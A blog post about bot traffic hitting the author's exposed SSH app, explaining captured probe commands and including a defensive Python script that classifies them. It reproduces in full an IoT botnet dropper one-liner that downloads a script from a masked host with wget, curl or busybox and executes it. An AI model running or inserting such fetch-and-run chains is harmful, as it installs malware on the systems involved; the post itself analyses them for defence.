Here is what happened when I expose my SSH app


As I wrote in the previous post, I now have an SSH app that has been running for a month. The good thing is that I get lots of visitors. The bad thing is that, unfortunately, none of them is an actual user🥲

My SSH app is under attack.

It’s no problem. The app speaks the SSH protocol over the network, but it doesn’t give attackers an actual shell at all. (The app runs in a distroless container image, which keeps its vulnerability exposure to a minimum.)

Messages I Got

So what do the attacks look like? Let me share some of the hello messages I received.

echo IoT_ACCESS_VERIFIED

This is the message I have received most often. What does it even mean? It simply prints the literal string IoT_ACCESS_VERIFIED, and it only does so if the command actually ran. As you may have realized, it is almost certainly sent by bots: the string is a canary. The bot sends the command, and if it sees that exact string come back from a server it knows it has command execution without having to parse anything, and it reports to its operator that it has found a new target. Is this a de-facto standard echo command in the bot community? Or there might be a well-known program written for this purpose in Go.

The list contains many messages with a similar purpose:

whoami
true
pwd
hostnmae

Let’s see what other messages look like:

uname -s -m
uname -a

I haven’t used uname personally. The command identifies the OS and the CPU architecture: -s prints the kernel name and -m the machine architecture (for example "Linux x86_64"), while -a prints everything, including the kernel version. For a bot that ships a separate binary for each CPU type, that architecture string is what decides which payload it sends next. I guess it is also used to find vulnerable servers on the internet running obsolete OS versions. It’s a bit scary to think of a website that has been unmaintained for years…


mount | head - 5

This lists the filesystems currently mounted on the server you’re on. Why this command? No idea. The output does reveal filesystem types and mount options, though: an overlay root is a strong hint that the target is a container, and the mount flags show which of the usual drop directories (/tmp and friends) are actually writable.

netstat -tulpn 2>/dev/null | grep LISTEN | head -20

This one-liner displays the first 20 listening sockets: -t and -u select TCP and UDP, -l listening sockets only, -n numeric addresses and ports, and -p the owning process (which is only shown for your own processes unless you are root; the 2>/dev/null hides the warning about that). Cool.


cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm sMLuxc.sh;wget http://<server_name>/sMLuxc.sh || curl -O http://<server_name>/sMLuxc.sh || /bin/busybox wget http://<server_name>/sMLuxc.sh; chmod 777 sMLuxc.sh;./sMLuxc.sh

This one is the most aggressive one I have received. It downloads a malicious script and runs it. Interesting… (I masked the IP address of the site so that no one accidentally visits it.) Reading it left to right: it tries a list of directories in order until one of the cd commands succeeds (the list runs from the directory most likely to be writable down to the root directory), deletes any earlier copy of the script, then downloads it with wget, falling back to curl and finally to /bin/busybox wget (that busybox fallback is a sign the campaign is aimed at embedded and IoT devices, where busybox is often the only downloader available), makes the file world-executable with chmod 777, and runs it. This is the standard shape of an IoT botnet dropper.
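To show how these probes fit together as stages of one attack, here is an added example of my own (not the author’s app and not any bot’s code): a small Python triage routine that labels each captured exec string by stage and pulls the drop directories, download URL and script name out of the dropper one-liner. The input list is constructed from the commands quoted above; the host in the URL is the post’s own <server_name> redaction and is kept as-is. An SSH app that refuses exec requests could log these labels instead of only the raw strings.

```python
"""Triage SSH exec-request strings such as the ones quoted in this post.

Added example, not the blog author's app or any bot's code.  The input
list is constructed from the commands quoted above; the URL host is the
post's own <server_name> redaction and is kept as-is.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: the exec strings quoted in the post.
CAPTURED = [
    "echo IoT_ACCESS_VERIFIED",
    "whoami",
    "true",
    "pwd",
    "hostnmae",
    "uname -s -m",
    "uname -a",
    "mount | head - 5",
    "netstat -tulpn 2>/dev/null | grep LISTEN | head -20",
    "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm sMLuxc.sh;"
    "wget http://<server_name>/sMLuxc.sh || curl -O http://<server_name>/sMLuxc.sh"
    " || /bin/busybox wget http://<server_name>/sMLuxc.sh; chmod 777 sMLuxc.sh;./sMLuxc.sh",
]

URL_RE = re.compile(r"https?://[^\s;|&'\"]+")
DOWNLOADER_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
RUN_RE = re.compile(r"\bchmod\b|\bsh\s|\./\S+")


def classify(cmd: str) -> str:
    """Label one exec string by the stage of the attack it belongs to."""
    c = cmd.strip()
    # Fetch-and-run chains also contain cd/rm/echo, so test for them first.
    if DOWNLOADER_RE.search(c) and RUN_RE.search(c):
        return "dropper"
    # "echo MARKER": the bot greps the reply for the literal to learn
    # whether it has command execution at all.
    if re.fullmatch(r"echo\s+\S+", c):
        return "canary"
    # Kernel name / CPU architecture, used to pick a matching payload build.
    if c.startswith("uname"):
        return "fingerprint"
    # Look around on the box: mounts, listening sockets, processes.
    if re.match(r"(mount|netstat|ss|ps|df|cat\s+/proc/\S+)\b", c):
        return "enumeration"
    # A single bare word with no arguments (whoami, pwd, true ...).  Typos
    # such as the page's "hostnmae" land here too; a misspelled command
    # that still gets sent is itself a sign of an unattended bot.
    if re.fullmatch(r"[A-Za-z_][\w-]*", c):
        return "recon"
    return "unknown"


@dataclass
class Dropper:
    dirs: List[str]          # directories tried, in order, until a cd succeeds
    urls: List[str]          # distinct download URLs, in fallback order
    script: Optional[str]    # the file that finally gets executed
    busybox: bool            # /bin/busybox fallback: built for embedded/IoT targets


def parse_dropper(cmd: str) -> Dropper:
    """Pull the interesting pieces out of a 'cd ...; wget ...; chmod; run' chain."""
    dirs: List[str] = []
    script: Optional[str] = None
    # ';' separates stages; '||' separates fallbacks within one stage.
    for stage in (s.strip() for s in cmd.split(";")):
        for alt in (a.strip() for a in stage.split("||")):
            words = alt.split()
            if len(words) >= 2 and words[0] == "cd":
                dirs.append(words[1])
            elif words and words[0] == "chmod":
                script = words[-1]
            elif words and words[0].startswith("./") and script is None:
                script = words[0][2:]
    urls = list(dict.fromkeys(URL_RE.findall(cmd)))  # dedupe, keep order
    return Dropper(dirs=dirs, urls=urls, script=script, busybox="busybox" in cmd)


def triage(commands: List[str]) -> List[tuple]:
    """Return (command, label) pairs: what an SSH app could log per refused exec."""
    return [(c, classify(c)) for c in commands]


if __name__ == "__main__":
    for cmd, label in triage(CAPTURED):
        print(f"{label:12} {cmd[:60]}")
        if label == "dropper":
            print("   ", parse_dropper(cmd))
```

The dropper test runs before the others on purpose: the fetch-and-run chain also contains cd, rm and a bare script name, so any of the narrower rules would misfile it if checked first. The URL and script name are what you would feed to a blocklist or a sandbox; the ordered directory list tells you where on disk to look if a host did run it.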

One More Thing

They come to my app from all over the world, after all. So I would like to show them the following code as a welcome message😊

aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1kRlVsQVFaQjlOZwo=

It should be too easy for them. But I hope they like it😉

© 2025 Hiro